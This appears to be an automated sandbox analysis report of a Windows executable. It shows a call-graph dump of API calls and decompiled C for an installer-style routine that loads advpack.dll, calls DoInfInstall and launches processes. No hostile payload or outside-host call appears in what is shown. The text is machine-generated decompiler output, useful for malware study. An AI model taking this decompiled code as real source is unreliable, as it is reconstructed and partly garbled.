2732->2732 2733 23b72 2732->2733 2734 23b53 2732->2734 2934 24fe0 2733->2934 2736 26517 24 API calls 2734->2736 2737 23b70 2736->2737 2738 23b7b 2737->2738 2739 26298 10 API calls 2737->2739 2738->2471 2739->2738 2741 22622 2740->2741 2742 22583 2740->2742 2961 224e0 GetWindowsDirectoryA 2741->2961 2744 2258b 2742->2744 2745 225e8 RegOpenKeyExA 2742->2745 2747 225e3 2744->2747 2748 2259b RegOpenKeyExA 2744->2748 2746 22609 RegQueryInfoKeyA 2745->2746 2745->2747 2749 225d1 RegCloseKey 2746->2749 2747->2469 2748->2747 2750 225bc RegQueryValueExA 2748->2750 2749->2747 2750->2749 2752 23bdb 2751->2752 2755 23bec 2751->2755 2753 2468f 7 API calls 2752->2753 2753->2755 2754 23c03 memset 2754->2755 2755->2754 2756 23d13 2755->2756 2759 23d26 2755->2759 2760 2468f 7 API calls 2755->2760 2762 23fd7 2755->2762 2763 23d7b CompareStringA 2755->2763 2766 23fab 2755->2766 2769 23f46 LocalFree 2755->2769 2770 23f1e LocalFree 2755->2770 2774 23cc7 CompareStringA 2755->2774 2785 23e10 2755->2785 2969 21ae8 2755->2969 3010 2202a memset memset RegCreateKeyExA 2755->3010 3036 23fef 2755->3036 2757 244b9 20 API calls 2756->2757 2757->2759 2761 26ce0 4 API calls 2759->2761 2760->2755 2764 23f60 2761->2764 2762->2759 3060 22267 2762->3060 2763->2755 2763->2762 2764->2468 2768 244b9 20 API calls 2766->2768 2772 23fbe LocalFree 2768->2772 2769->2759 2770->2755 2770->2762 2772->2759 2774->2755 2775 23f92 2778 244b9 20 API calls 2775->2778 2776 23e1f GetProcAddress 2777 23f64 2776->2777 2776->2785 2779 244b9 20 API calls 2777->2779 2780 23fa9 2778->2780 2781 23f75 FreeLibrary 2779->2781 2782 23f7c LocalFree 2780->2782 2781->2782 2783 26285 GetLastError 2782->2783 2784 23f8b 2783->2784 2784->2759 2785->2775 2785->2776 2786 23f40 FreeLibrary 2785->2786 2787 23eff FreeLibrary 2785->2787 3050 26495 2785->3050 2786->2769 2787->2770 2789 2468f 7 API calls 2788->2789 2790 23a55 LocalAlloc 2789->2790 2791 23a8e 2790->2791 2792 23a6c 2790->2792 2794 2468f 7 API calls 2791->2794 2793 244b9 20 API calls 2792->2793 2795 23a7d 2793->2795 2796 23a98 2794->2796 2797 26285 GetLastError 2795->2797 2798 23ac5 lstrcmpA 2796->2798 2799 23a9c 2796->2799 2806 22f64 2797->2806 2800 23ada 2798->2800 2801 23b0d LocalFree 2798->2801 2802 244b9 20 API calls 2799->2802 2803 26517 24 API calls 2800->2803 2801->2806 2804 23aad LocalFree 2802->2804 2805 23aec LocalFree 2803->2805 2804->2806 2805->2806 2806->2438 2806->2472 2808 2628f 2807->2808 2808->2472 2810 2468f 7 API calls 2809->2810 2811 2417d LocalAlloc 2810->2811 2812 24195 2811->2812 2813 241a8 2811->2813 2814 244b9 20 API calls 2812->2814 2815 2468f 7 API calls 2813->2815 2816 241a6 2814->2816 2817 241b5 2815->2817 2816->2472 2818 241c5 lstrcmpA 2817->2818 2819 241b9 2817->2819 2818->2819 2820 241e6 LocalFree 2818->2820 2821 244b9 20 API calls 2819->2821 2820->2816 2821->2820 2823 2171e _vsnprintf 2822->2823 2833 262c9 FindResourceA 2823->2833 2825 26353 2827 26ce0 4 API calls 2825->2827 2826 262cb LoadResource LockResource 2826->2825 2829 262e0 2826->2829 2828 251ca 2827->2828 2828->2670 2828->2671 2830 26355 FreeResource 2829->2830 2831 2631b FreeResource 2829->2831 2830->2825 2832 2171e _vsnprintf 2831->2832 2832->2833 2833->2825 2833->2826 2835 2548a 2834->2835 2853 2551a 2834->2853 2894 253a1 2835->2894 2837 25581 2841 26ce0 4 API calls 2837->2841 2840 25495 2840->2837 2844 254c2 GetSystemInfo 2840->2844 2845 2550c 2840->2845 2846 2559a 2841->2846 2842 2553b CreateDirectoryA 2847 25577 2842->2847 2848 25547 2842->2848 2843 2554d 2843->2837 2852 2597d 34 API calls 2843->2852 2851 254da 2844->2851 2849 2658a CharPrevA 2845->2849 2846->2710 2858 22630 GetWindowsDirectoryA 2846->2858 2850 26285 GetLastError 2847->2850 2848->2843 2849->2853 2854 2557c 2850->2854 2851->2845 2855 2658a CharPrevA 2851->2855 2856 2555c 2852->2856 2905 258c8 2853->2905 2854->2837 2855->2845 2856->2837 2857 25568 RemoveDirectoryA 2856->2857 2857->2837 2859 2265e 2858->2859 2860 2266f 2858->2860 2861 244b9 20 API calls 2859->2861 2862 26ce0 4 API calls 2860->2862 2861->2860 2863 22687 2862->2863 2863->2697 2863->2711 2865 269a1 2864->2865 2866 2696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 26989 MulDiv 2866->2867 2867->2865 2869 259bb 2868->2869 2870 259dd GetDiskFreeSpaceA 2868->2870 2871 244b9 20 API calls 2869->2871 2872 25ba1 memset 2870->2872 2873 25a21 MulDiv 2870->2873 2874 259cc 2871->2874 2875 26285 GetLastError 2872->2875 2873->2872 2876 25a50 GetVolumeInformationA 2873->2876 2877 26285 GetLastError 2874->2877 2878 25bbc GetLastError FormatMessageA 2875->2878 2879 25ab5 SetCurrentDirectoryA 2876->2879 2880 25a6e memset 2876->2880 2889 259d1 2877->2889 2881 25be3 2878->2881 2888 25acc 2879->2888 2882 26285 GetLastError 2880->2882 2883 244b9 20 API calls 2881->2883 2884 25a89 GetLastError FormatMessageA 2882->2884 2886 25bf5 SetCurrentDirectoryA 2883->2886 2884->2881 2885 26ce0 4 API calls 2887 25c11 2885->2887 2886->2889 2887->2697 2890 25b0a 2888->2890 2892 25b20 2888->2892 2889->2885 2891 244b9 20 API calls 2890->2891 2891->2889 2892->2889 2917 2268b 2892->2917 2899 253bf 2894->2899 2895 2171e _vsnprintf 2895->2899 2896 2658a CharPrevA 2897 253fa RemoveDirectoryA GetFileAttributesA 2896->2897 2898 2544f CreateDirectoryA 2897->2898 2897->2899 2900 25415 GetTempFileNameA 2898->2900 2901 2543a 2898->2901 2899->2895 2899->2896 2899->2900 2900->2901 2902 25429 DeleteFileA CreateDirectoryA 2900->2902 2903 26ce0 4 API calls 2901->2903 2902->2901 2904 25449 2903->2904 2904->2840 2906 258d8 2905->2906 2906->2906 2907 258df LocalAlloc 2906->2907 2908 258f3 2907->2908 2909 25919 2907->2909 2910 244b9 20 API calls 2908->2910 2912 2658a CharPrevA 2909->2912 2916 25906 2910->2916 2911 26285 GetLastError 2913 25534 2911->2913 2914 25931 CreateFileA LocalFree 2912->2914 2913->2842 2913->2843 2915 2595b CloseHandle GetFileAttributesA 2914->2915 2914->2916 2915->2916 2916->2911 2916->2913 2918 226e5 2917->2918 2919 226b9 2917->2919 2921 226ea 2918->2921 2922 2271f 2918->2922 2920 2171e _vsnprintf 2919->2920 2923 226cc 2920->2923 2924 2171e _vsnprintf 2921->2924 2925 2171e _vsnprintf 2922->2925 2932 226e3 2922->2932 2927 244b9 20 API calls 2923->2927 2928 226fd 2924->2928 2930 22735 2925->2930 2926 26ce0 4 API calls 2931 2276d 2926->2931 2927->2932 2929 244b9 20 API calls 2928->2929 2929->2932 2933 244b9 20 API calls 2930->2933 2931->2889 2932->2926 2933->2932 2935 2468f 7 API calls 2934->2935 2936 24ff5 FindResourceA LoadResource LockResource 2935->2936 2937 25020 2936->2937 2950 2515f 2936->2950 2938 25057 2937->2938 2939 25029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2953 24efd 2938->2953 2939->2938 2942 25060 2944 244b9 20 API calls 2942->2944 2943 2507c 2945 25075 2943->2945 2946 244b9 20 API calls 2943->2946 2944->2945 2947 25110 FreeResource 2945->2947 2948 2511d 2945->2948 2946->2945 2947->2948 2949 2513a 2948->2949 2951 244b9 20 API calls 2948->2951 2949->2950 2952 2514c SendMessageA 2949->2952 2950->2737 2951->2949 2952->2950 2954 24f4a 2953->2954 2955 24fa1 2954->2955 2956 24980 25 API calls 2954->2956 2957 26ce0 4 API calls 2955->2957 2959 24f67 2956->2959 2958 24fc6 2957->2958 2958->2942 2958->2943 2959->2955 2960 24b60 FindCloseChangeNotification 2959->2960 2960->2955 2962 22510 2961->2962 2963 2255b 2961->2963 2964 2658a CharPrevA 2962->2964 2965 26ce0 4 API calls 2963->2965 2966 22522 WritePrivateProfileStringA _lopen 2964->2966 2967 22569 2965->2967 2966->2963 2968 22548 _llseek _lclose 2966->2968 2967->2747 2968->2963 2970 21b25 2969->2970 3074 21a84 2970->3074 2972 21b57 2973 2658a CharPrevA 2972->2973 2974 21b8c 2972->2974 2973->2974 2975 266c8 2 API calls 2974->2975 2976 21bd1 2975->2976 2977 21d73 2976->2977 2978 21bd9 CompareStringA 2976->2978 2980 266c8 2 API calls 2977->2980 2978->2977 2979 21bf7 GetFileAttributesA 2978->2979 2981 21d53 2979->2981 2982 21c0d 2979->2982 2983 21d7d 2980->2983 2986 21d64 2981->2986 2982->2981 2987 21a84 2 API calls 2982->2987 2984 21d81 CompareStringA 2983->2984 2985 21df8 LocalAlloc 2983->2985 2984->2985 2994 21d9b 2984->2994 2985->2986 2988 21e0b GetFileAttributesA 2985->2988 2989 244b9 20 API calls 2986->2989 2990 21c31 2987->2990 2991 21e45 2988->2991 2992 21e1d 2988->2992 3004 21d6c 2989->3004 2993 21c50 LocalAlloc 2990->2993 2998 21a84 2 API calls 2990->2998 3080 22aac 2991->3080 2992->2991 2993->2986 2995 21c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2995 2994->2994 2999 21dbe LocalAlloc 2994->2999 3003 21cf8 2995->3003 3008 21cc2 2995->3008 2996 26ce0 4 API calls 2997 21ea1 2996->2997 2997->2755 2998->2993 2999->2986 3002 21de1 2999->3002 3007 2171e _vsnprintf 3002->3007 3005 21d23 3003->3005 3006 21d09 GetShortPathNameA 3003->3006 3004->2996 3009 2171e _vsnprintf 3005->3009 3006->3005 3007->3008 3008->3004 3009->3008 3011 22256 3010->3011 3012 2209a 3010->3012 3013 26ce0 4 API calls 3011->3013 3015 2171e _vsnprintf 3012->3015 3017 220dc 3012->3017 3014 22263 3013->3014 3014->2755 3016 220af RegQueryValueExA 3015->3016 3016->3012 3016->3017 3018 220e4 RegCloseKey 3017->3018 3019 220fb GetSystemDirectoryA 3017->3019 3018->3011 3020 2658a CharPrevA 3019->3020 3021 2211b LoadLibraryA 3020->3021 3022 22179 GetModuleFileNameA 3021->3022 3023 2212e GetProcAddress FreeLibrary 3021->3023 3024 221de RegCloseKey 3022->3024 3028 22177 LocalAlloc 3022->3028 3023->3022 3025 2214e GetSystemDirectoryA 3023->3025 3024->3011 3026 22165 3025->3026 3025->3028 3027 2658a CharPrevA 3026->3027 3027->3028 3030 221ec 3028->3030 3031 221cd 3028->3031 3033 2171e _vsnprintf 3030->3033 3032 244b9 20 API calls 3031->3032 3032->3024 3034 22218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3011 3037 24016 CreateProcessA 3036->3037 3038 24106 3036->3038 3039 24041 WaitForSingleObject GetExitCodeProcess 3037->3039 3040 240c4 3037->3040 3041 26ce0 4 API calls 3038->3041 3042 24070 3039->3042 3044 26285 GetLastError 3040->3044 3043 24117 3041->3043 3107 2411b 3042->3107 3043->2755 3046 240c9 GetLastError FormatMessageA 3044->3046 3048 244b9 20 API calls 3046->3048 3047 24096 CloseHandle CloseHandle 3047->3038 3049 240ba 3047->3049 3048->3038 3049->3038 3051 264c2 3050->3051 3052 2658a CharPrevA 3051->3052 3053 264d8 GetFileAttributesA 3052->3053 3054 26501 LoadLibraryA 3053->3054 3055 264ea 3053->3055 3057 26508 3054->3057 3055->3054 3056 264ee LoadLibraryExA 3055->3056 3056->3057 3058 26ce0 4 API calls 3057->3058 3059 26513 3058->3059 3059->2785 3061 22381 3060->3061 3062 22289 RegOpenKeyExA 3060->3062 3063 26ce0 4 API calls 3061->3063 3062->3061 3064 222b1 RegQueryValueExA 3062->3064 3065 2238c 3063->3065 3066 222e6 memset GetSystemDirectoryA 3064->3066 3067 22374 RegCloseKey 3064->3067 3065->2759 3068 22321 3066->3068 3069 2230f 3066->3069 3067->3061 3070 2171e _vsnprintf 3068->3070 3071 2658a CharPrevA 3069->3071 3072 2233f RegSetValueExA 3070->3072 3071->3068 3072->3067 3075 21a9a 3074->3075 3077 21aba 3075->3077 3079 21aaf 3075->3079 3093 2667f 3075->3093 3077->2972 3078 2667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 22ad4 GetModuleFileNameA 3080->3081 3082 22be6 3080->3082 3090 22b02 3081->3090 3083 26ce0 4 API calls 3082->3083 3085 22bf5 3083->3085 3084 22af1 IsDBCSLeadByte 3084->3090 3085->3004 3086 22b11 CharNextA CharUpperA 3089 22b8d CharUpperA 3086->3089 3086->3090 3087 22bca CharNextA 3088 22bd3 CharNextA 3087->3088 3088->3090 3089->3090 3090->3082 3090->3084 3090->3086 3090->3087 3090->3088 3092 22b43 CharPrevA 3090->3092 3098 265e8 3090->3098 3092->3090 3094 26689 3093->3094 3095 266a5 3094->3095 3096 26648 IsDBCSLeadByte 3094->3096 3097 26697 CharNextA 3094->3097 3095->3075 3096->3094 3097->3094 3099 265f4 3098->3099 3099->3099 3100 265fb CharPrevA 3099->3100 3101 26611 CharPrevA 3100->3101 3102 2660b 3101->3102 3103 2661e 3101->3103 3102->3101 3102->3103 3104 26627 CharPrevA 3103->3104 3105 26634 CharNextA 3103->3105 3106 2663d 3103->3106 3104->3105 3104->3106 3105->3106 3106->3090 3108 24132 3107->3108 3110 2412a 3107->3110 3111 21ea7 3108->3111 3110->3047 3112 21eba 3111->3112 3113 21ed3 3111->3113 3114 2256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 21ff0 RegOpenKeyExA 3115->3116 3117 22026 3115->3117 3116->3117 3118 2200f RegDeleteValueA RegCloseKey 3116->3118 3117->2479 3118->3117 3227 26a20 __getmainargs 3228 219e0 3229 21a03 3228->3229 3230 21a24 GetDesktopWindow 3228->3230 3232 21a20 3229->3232 3233 21a16 EndDialog 3229->3233 3231 243d0 11 API calls 3230->3231 3234 21a33 LoadStringA SetDlgItemTextA MessageBeep 3231->3234 3235 26ce0 4 API calls 3232->3235 3233->3232 3234->3232 3236 21a7e 3235->3236 3237 26bef _XcptFilter 3238 27270 _except_handler4_common 3239 269b0 3240 269b5 3239->3240 3248 26fbe GetModuleHandleW 3240->3248 3242 269c1 __set_app_type __p__fmode __p__commode 3243 269f9 3242->3243 3244 26a02 __setusermatherr 3243->3244 3245 26a0e 3243->3245 3244->3245 3250 271ef _controlfp 3245->3250 3247 26a13 3249 26fcf 3248->3249 3249->3242 3250->3247 3251 234f0 3252 23504 3251->3252 3253 235b8 3251->3253 3252->3253 3254 2351b 3252->3254 3255 235be GetDesktopWindow 3252->3255 3256 23671 EndDialog 3253->3256 3257 23526 3253->3257 3259 2354f 3254->3259 3260 2351f 3254->3260 3258 243d0 11 API calls 3255->3258 3256->3257 3261 235d6 3258->3261 3259->3257 3263 23559 ResetEvent 3259->3263 3260->3257 3262 2352d TerminateThread EndDialog 3260->3262 3265 235e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3261->3265 3266 2361d SetWindowTextA CreateThread 3261->3266 3262->3257 3264 244b9 20 API calls 3263->3264 3267 23581 3264->3267 3265->3266 3266->3257 3268 23646 3266->3268 3269 2359b SetEvent 3267->3269 3271 2358a SetEvent 3267->3271 3270 244b9 20 API calls 3268->3270 3272 23680 4 API calls 3269->3272 3270->3253 3271->3257 3272->3253 3273 26ef0 3274 26f2d 3273->3274 3276 26f02 3273->3276 3275 26f27 ?terminate@ 3275->3274 3276->3274 3276->3275

                                                                                                                                                                                                                                                Callgraph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                                                                                                • Disassembly available
                                                                                                                                                                                                                                                callgraph 0 Function_00024702 51 Function_00021680 0->51 80 Function_000216B3 0->80 1 Function_00026C03 28 Function_0002724D 1->28 2 Function_00027000 3 Function_00024200 4 Function_00023100 95 Function_000243D0 4->95 5 Function_00027208 6 Function_0002490C 7 Function_00023210 19 Function_00024224 7->19 49 Function_0002597D 7->49 57 Function_0002658A 7->57 83 Function_000244B9 7->83 89 Function_000258C8 7->89 7->95 8 Function_00027010 9 Function_00025C17 10 Function_00026517 10->83 11 Function_0002411B 75 Function_00021EA7 11->75 12 Function_0002171E 13 Function_0002621E 13->49 56 Function_00026285 13->56 13->83 98 Function_00026CE0 13->98 14 Function_0002681F 14->98 117 Function_000266F9 14->117 15 Function_00022F1D 15->13 18 Function_00023B26 15->18 24 Function_00023A3F 15->24 40 Function_00025164 15->40 41 Function_00024169 15->41 42 Function_0002256D 15->42 15->56 15->57 68 Function_00023BA2 15->68 72 Function_000255A0 15->72 15->83 15->98 103 Function_000251E5 15->103 16 Function_00027120 17 Function_00026A20 18->10 65 Function_00026298 18->65 96 Function_00024FE0 18->96 19->51 19->83 20 Function_00026E2A 113 Function_00026CF0 20->113 21 Function_0002202A 21->12 21->57 21->83 21->98 22 Function_00022630 22->83 22->98 23 Function_00024C37 24->10 24->56 60 Function_0002468F 24->60 24->83 25 Function_00026C3F 26 Function_00026F40 27 Function_00026648 29 Function_00026952 30 Function_00024A50 31 Function_00023450 31->95 32 Function_00026F54 32->5 32->28 33 Function_00027155 34 Function_00024B60 35 Function_00026A60 35->5 35->25 35->28 35->33 36 Function_00027060 35->36 116 Function_00022BFB 35->116 36->8 36->16 37 Function_00026760 38 Function_00025467 38->49 38->51 54 Function_00021781 38->54 38->56 38->57 73 Function_000253A1 38->73 38->89 38->98 39 Function_00022267 39->12 39->57 39->98 40->60 40->65 40->83 41->60 41->83 97 Function_000224E0 42->97 43 Function_0002476D 43->10 78 Function_000266AE 43->78 44 Function_00022773 44->51 44->54 44->57 44->98 45 Function_00027270 46 Function_00026C70 47 Function_0002487A 47->6 48 Function_0002667F 48->27 49->56 58 Function_0002268B 49->58 49->83 49->98 50 Function_00024980 50->47 50->83 51->54 52 Function_00023680 53 Function_00026380 55 Function_00021A84 55->48 57->80 58->12 58->83 58->98 59 Function_00022A89 61 Function_00026793 62 Function_00022390 62->51 62->57 62->62 62->80 62->98 63 Function_00021F90 63->75 63->83 63->98 64 Function_00026495 64->54 64->57 64->98 65->12 65->98 66 Function_00024E99 66->51 67 Function_00025C9E 67->9 67->20 67->48 67->51 67->57 67->83 90 Function_000266C8 67->90 67->98 99 Function_000231E0 67->99 68->21 68->39 68->54 68->56 68->60 68->64 68->83 68->98 105 Function_00021AE8 68->105 110 Function_00023FEF 68->110 69 Function_000272A2 70 Function_000218A3 70->98 109 Function_000217EE 70->109 71 Function_00024CA0 72->10 72->22 72->29 72->38 72->49 72->54 72->56 72->57 72->60 72->83 72->98 73->12 73->51 73->57 73->98 74 Function_00026FA1 75->42 76 Function_00026FA5 76->28 77 Function_00022CAA 77->10 77->60 77->62 77->67 77->70 77->83 77->98 108 Function_000236EE 77->108 79 Function_00022AAC 79->51 91 Function_000217C8 79->91 79->98 107 Function_000265E8 79->107 80->54 81 Function_000269B0 81->2 81->46 84 Function_00026FBE 81->84 111 Function_000271EF 81->111 82 Function_000252B6 82->54 82->62 82->98 102 Function_00021FE1 82->102 82->107 83->12 83->14 83->51 92 Function_000267C9 83->92 83->98 84->32 85 Function_00024CC0 86 Function_00024BC0 87 Function_000230C0 88 Function_000263C0 88->54 88->57 88->98 89->51 89->56 89->57 89->83 90->27 92->61 93 Function_00024AD0 93->52 94 Function_00024CD0 94->0 94->23 94->34 94->43 94->50 94->66 94->98 100 Function_000247E0 94->100 95->98 96->60 96->83 119 Function_00024EFD 96->119 97->57 97->98 98->113 100->51 100->83 101 Function_000219E0 101->95 101->98 103->56 103->60 103->83 104 Function_000270EB 105->12 105->51 105->54 105->55 105->57 105->79 105->80 105->83 105->90 105->98 106 Function_000228E8 106->44 106->59 108->14 108->59 108->83 108->92 108->98 108->106 109->98 110->11 110->56 110->83 110->98 112 Function_00026BEF 114 Function_000234F0 114->52 114->83 114->95 115 Function_00026EF0 116->15 116->63 116->77 116->82 118 Function_000270FE 119->34 119->50 119->98

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00023BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMONCrypto
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 36 23ba2-23bd9 37 23bdb-23bee call 2468f 36->37 38 23bfd-23bff 36->38 44 23d13-23d30 call 244b9 37->44 45 23bf4-23bf7 37->45 40 23c03-23c28 memset 38->40 42 23d35-23d48 call 21781 40->42 43 23c2e-23c40 call 2468f 40->43 49 23d4d-23d52 42->49 43->44 54 23c46-23c49 43->54 57 23f4d 44->57 45->38 45->44 52 23d54-23d6c call 2468f 49->52 53 23d9e-23db6 call 21ae8 49->53 52->44 69 23d6e-23d75 52->69 53->57 67 23dbc-23dc2 53->67 54->44 55 23c4f-23c56 54->55 59 23c60-23c65 55->59 60 23c58-23c5e 55->60 62 23f4f-23f63 call 26ce0 57->62 65 23c67-23c6d 59->65 66 23c75-23c7c 59->66 64 23c6e-23c73 60->64 72 23c87-23c89 64->72 65->64 66->72 75 23c7e-23c82 66->75 73 23de6-23de8 67->73 74 23dc4-23dce 67->74 70 23fda-23fe1 69->70 71 23d7b-23d98 CompareStringA 69->71 81 23fe3 call 22267 70->81 82 23fe8-23fea 70->82 71->53 71->70 72->49 78 23c8f-23c98 72->78 79 23f0b-23f15 call 23fef 73->79 80 23dee-23df5 73->80 74->73 77 23dd0-23dd7 74->77 75->72 77->73 84 23dd9-23ddb 77->84 85 23cf1-23cf3 78->85 86 23c9a-23c9c 78->86 91 23f1a-23f1c 79->91 87 23fab-23fd2 call 244b9 LocalFree 80->87 88 23dfb-23dfd 80->88 81->82 82->62 84->80 92 23ddd-23de1 call 2202a 84->92 85->53 90 23cf9-23d11 call 2468f 85->90 94 23ca5-23ca7 86->94 95 23c9e-23ca3 86->95 87->57 88->79 96 23e03-23e0a 88->96 90->44 90->49 98 23f46-23f47 LocalFree 91->98 99 23f1e-23f2d LocalFree 91->99 92->73 94->57 103 23cad 94->103 102 23cb2-23cc5 call 2468f 95->102 96->79 104 23e10-23e19 call 26495 96->104 98->57 106 23f33-23f3b 99->106 107 23fd7-23fd9 99->107 102->44 112 23cc7-23ce8 CompareStringA 102->112 103->102 113 23f92-23fa9 call 244b9 104->113 114 23e1f-23e36 GetProcAddress 104->114 106->40 107->70 112->85 115 23cea-23ced 112->115 126 23f7c-23f90 LocalFree call 26285 113->126 116 23f64-23f76 call 244b9 FreeLibrary 114->116 117 23e3c-23e80 114->117 115->85 116->126 120 23e82-23e87 117->120 121 23e8b-23e94 117->121 120->121 124 23e96-23e9b 121->124 125 23e9f-23ea2 121->125 124->125 128 23ea4-23ea9 125->128 129 23ead-23eb6 125->129 126->57 128->129 131 23ec1-23ec3 129->131 132 23eb8-23ebd 129->132 133 23ec5-23eca 131->133 134 23ece-23eec 131->134 132->131 133->134 137 23ef5-23efd 134->137 138 23eee-23ef3 134->138 139 23f40 FreeLibrary 137->139 140 23eff-23f09 FreeLibrary 137->140 138->137 139->98 140->99
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00023BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x28004; // 0xf4950d3e
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x29124 =  *0x29124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x28a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x28c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0002468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E000244B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x29124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00021AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00026CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00023FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x28580;
													if( *0x28580 != 0) {
														E00022267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x28180;
											if( *0x28180 == 0) {
												_t146 = 0x4c7;
												E000244B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x29124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x29a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00026495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E000244B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x29124 = E00026285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E000244B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x28a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x29a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x28a38 & 0x0000ffff;
											_v380 = 0x29154;
											_v376 = _t151;
											_v372 = 0x291e4;
											_v360 = _t97;
											if( *0x28a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x29a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x28d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x29a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x2a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x29124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x29a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x28a20;
										if( *0x28a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
